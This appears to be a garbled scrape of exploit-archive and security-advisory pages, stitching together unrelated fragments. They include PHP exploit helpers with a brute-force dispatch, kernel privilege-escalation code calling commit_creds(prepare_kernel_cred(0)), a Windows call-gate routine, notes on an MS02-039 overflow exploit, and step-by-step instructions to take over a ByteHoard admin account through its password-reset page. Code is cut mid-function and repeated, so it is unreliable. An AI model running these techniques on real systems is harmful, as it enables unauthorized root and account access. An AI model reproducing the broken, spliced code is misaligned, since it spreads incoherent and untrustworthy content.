Next Page >>
returns
function encode_str ($input){//converts the input into Ascii HTML, to ofuscate a bit
for ($i = 0; $i < strlen($input); $i++) {
$output .= "&#".ord($input[$i]).';';
}
//$output = htmlspecialchars($output);//uncomment to escape sepecial chars
return $output;
}
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
function mathCaptcha(){//generates a captcha for the form
$first_number=mt_rand(1, 94);//first operation number
$second_number=mt_rand(1, 5);//second operation number
$this->get_vhcs_conf();
$this->exec_cmd();
return;
}
function getparam($param, $nec=FALSE)
{
function getparam($param,$opt='')
{
global $argv;
foreach($argv as $value => $key)
{
if($key == '-'.$param) return $argv[$value+1];
}
if($opt) exit("\n-$param parameter required");
else return;
}
$url = getparam("url",1);
name = dns_lookup(addr); [1]
if(name != NULL) {
/* May be we should test name's length */ [!!]
sprintf(newLine, "%s %d %d %d %d %d %d", name, [2]
net_loss(at),
net_returned(at), net_xmit(at),
net_best(at) /1000, net_avg(at)/1000,
net_worst(at)/1000);
} else {
...
sprintf(newLine, "???");
case 2; $this->bf_sql_pwd(); break;
case 3: $this->bf_usr_pwd(); break;
default: $this->usage();
}
return;
}
function code_exec($loop=1)
{
# First loop
struct sockaddr_in sock;
struct hostent *host;
memset(&sock, 0, sizeof(sock));
if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0) return -1;
sock.sin_family = AF_INET;
sock.sin_port = htons(port);
if(!(host=gethostbyname(server))) return -1;
+ section: in theory, the instructions could be SVN_DELTA_WINDOW_SIZE
+ 1-byte copy-from-source instructions (though this is very unlikely). */
+#define MAX_INSTRUCTION_SECTION_LEN (SVN_DELTA_WINDOW_SIZE*MAX_INSTRUCTION_LEN)
/* Encode VAL into the buffer P using the variable-length svndiff
integer format. Return the incremented value of P after the
- encoded bytes have been written.
+ encoded bytes have been written. P must point to a buffer of size
+ at least MAX_ENCODED_INT_LEN.
This encoding uses the high bit of each byte as a continuation bit
requirements to achieve the concept that a polymorphic code must be
unpredictable, and it means random. I choose the MS02-039[1], because I have
all the requirements for this proof of concept:
1. Microsoft Windows Buffer Overflow[2];
2. Buffer to overflow is not too big;
3. More than just one Return Address[3];
4. Incredible high number of writable addresses only in
SQLSORT.DLL[4].
-[ MS02-039 Exploit Structure
if (is_array($var)) {
$array[$key] = stripslashes_array($var);
}
}
}
return $array;
}
function deltree($deldir) {
$mydir=@dir($deldir);
}
}
else
{
return NULL;
}
if (status == 0xc0000004)
{
free(mPtr);
mSize = mSize * 2;
PVOID * ppfn;
pmz = (PIMAGE_DOS_HEADER)
((UINT_PTR)hmMSHTML & ~(UINT_PTR)0xFFFFU);
if (pmz->e_magic != IMAGE_DOS_SIGNATURE || pmz->e_lfanew <= 0)
return NULL;
ppe = (PIMAGE_NT_HEADERS32)
((LONG_PTR)pmz + pmz->e_lfanew);
if ( ppe->Signature != IMAGE_NT_SIGNATURE ||
ppe->FileHeader.Machine != IMAGE_FILE_MACHINE_I386 ||
ISR_Entry_Point:
; For a long-mode (64-bit) ISR, RSP points to the following QWORDs:
;
; [<error code>]
; <return RIP> <return CS> <return RFLAGS>
; [<return RSP> <return SS>]
;
; The first act of typical ISR prologue code is to build a standard
; "trap frame" on the stack -- saving registers, etc.
Address ,
sizeof(ULONG),
&btr ,
0
);
return ;
}
void AddCallGate()
{
ULONG Gdt_Addr;
ULONG CallGateData[0x4];
{ $ip = getenv( 'HTTP_X_FORWARDED_FOR' ); }
elseif ( getenv( 'HTTP_CLIENT_IP' ) )
{ $ip = getenv( 'HTTP_CLIENT_IP' ); }
else { $ip = getenv( 'REMOTE_ADDR' ); }
}
return $ip;
}
This logic is flawed as it assumes that only proxy servers set these
HTTP headers. The fact is that the client is under complete control of
the attacker, which allows the attacker to set any arbitrary HTTP header
Log into bytehoard using a non privileged user.
Perform any desired actions, then log out.
Click on the "Lost Details" link.
Input the desired username you want to have access to ("admin" to get
administrator access) and submit the data.
The system will either return an error message or a "mail sent" message.
Ignore the last message and go directly to the index.php page (easily
obtained by erasing the "?page=passreset" part)
You should have access to the desired account.
ISR_Entry_Point:
; For a long-mode (64-bit) ISR, RSP points to the following QWORDs:
;
; [<error code>]
; <return RIP> <return CS> <return RFLAGS>
; [<return RSP> <return SS>]
;
; The first act of typical ISR prologue code is to build a standard
; "trap frame" on the stack -- saving registers, etc.
$result = mysql_query("SELECT * FROM `fcms_users` WHERE `id` =
$userid LIMIT 1") or die('<h1>Login Error (util.inc.php 275)</h1>' .
mysql_error());
if (mysql_num_rows($result) > 0) {
$r = mysql_fetch_array($result);
if ($r['username'] !== $username) { return false; } elseif
($r['password'] !== $password) { return false; } else { return true; }
} else {
return false;
}
}
4962| $v = $this->parse_clean_value( $v );
4963|
4964| $input[ $k ] = $v;
4965| }
....|
4969| return $input;
The "parse_clean_key()" function uses the "urldecode()"
function, this means you can encode each variable names.
For example, the parameter "act=Members" is the same
910 if( ( !(p_co64 = MP4_BoxGet( p_demux_track->p_stbl, "stco" ) )&&
911 !(p_co64 = MP4_BoxGet( p_demux_track->p_stbl, "co64" ) ) )||
912 ( !(p_stsc = MP4_BoxGet( p_demux_track->p_stbl, "stsc" ) ) ))
913 {
914 return( VLC_EGENERIC );
915 }
.. ..
943 i_last = p_demux_track->i_chunk_count; /* last chunk proceded */
} GenericBlockCipher;
This will cause a segmentation fault, when the ciphertext_to_compressed
function tries to give decrypted data to _gnutls_auth_cipher_add_auth for HMAC
verification, even though the data length is invalid, and it should have
returned GNUTLS_E_DECRYPTION_FAILED or GNUTLS_E_UNEXPECTED_PACKET_LENGTH
instead, before _gnutls_auth_cipher_add_auth was called.
Since the error was not returned soon enough, all of the various operations
ciphertext_to_compressed performs: i.e. setting the IV, removing the padding,
setting the "true" data length with the padding stripped, checking the padding
CHAR cPath[MAX_PATH + 32] = { 0 };
DWORD dwPathLen = MAX_PATH;
lResult = RegOpenKeyA(HKEY_LOCAL_MACHINE, AppPath, &hKey);
if (FAILED(lResult))
return FALSE;
DWORD dwType = REG_SZ;
lResult = RegQueryValueExA(hKey, "Path", NULL, &dwType, (LPBYTE)cPath, &dwPathLen);
RegCloseKey(hKey);
if (FAILED(lResult))
if (($tmp == 0) && ($nrows == 1)) {
$U = DB_fetchArray($result);
$uid = $U['uid'];
if ($U['status'] == USER_ACCOUNT_DISABLED) {
// banned, jump to here to save an md5 calc.
return USER_ACCOUNT_DISABLED;
} elseif ($U['passwd'] != SEC_encryptPassword($password)) {
return -1; // failed login
} elseif ($U['status'] == USER_ACCOUNT_AWAITING_APPROVAL) {
return USER_ACCOUNT_AWAITING_APPROVAL;
int getroot(void)
{
commit_creds(prepare_kernel_cred(0));
return 0;
}
int konami(void)
{
When digging into the vulnerability, in the 0x20 position of a
hypervisor packet there is a QWORD (0x3333333333333333 in the PoC) that
seems to be the length of something. This value is checked in the
function 'VidLockObjectShared', located in the driver 'vid.sys'. The
QWORD is compared against the value 0xffeff and the function returns
with error 0xC0370022 if the QWORD value is higher. Apparently, that
makes some flag is not set and the package processing never ends.
Unfortunately, additional and specific technical information regarding
the root and nature of this vulnerability was not provided by Microsoft.
Original URL:
http://securityreason.com/achievement_securityalert/99
--- 0.Description ---
The getservbyname(), and getservbyport() functions each return a pointer to an object with the following structure containing the broken-out fields of a line in the network services data base,
struct servent *
getservbyname(const char *name, const char *proto);
struct servent *
ULONG64 n,num;
for (n=0;n<8;n++) {
num = (num << 8) | (rand()%256);
}
return (num);
}
ULONG64 expmod (ULONG64 x,ULONG64 n,ULONG64 m) {
ULONG64 r = 1;
continue;
}
if (!strcmp(name, sname)) {
fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
fclose(f);
return addr;
}
}
fclose(f);
if (rep)
> continue;
> }
> if (!strcmp(name, sname)) {
> fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
> fclose(f);
> return addr;
> }
> }
>
> fclose(f);
> if (rep)
> continue;
> }
> if (!strcmp(name, sname)) {
> fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
> fclose(f);
> return addr;
> }
> }
>
> fclose(f);
> if (rep)
> continue;
> }
> if (!strcmp(name, sname)) {
> fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
> fclose(f);
> return addr;
> }
> }
>
> fclose(f);
> if (rep)
Next Page>>
|
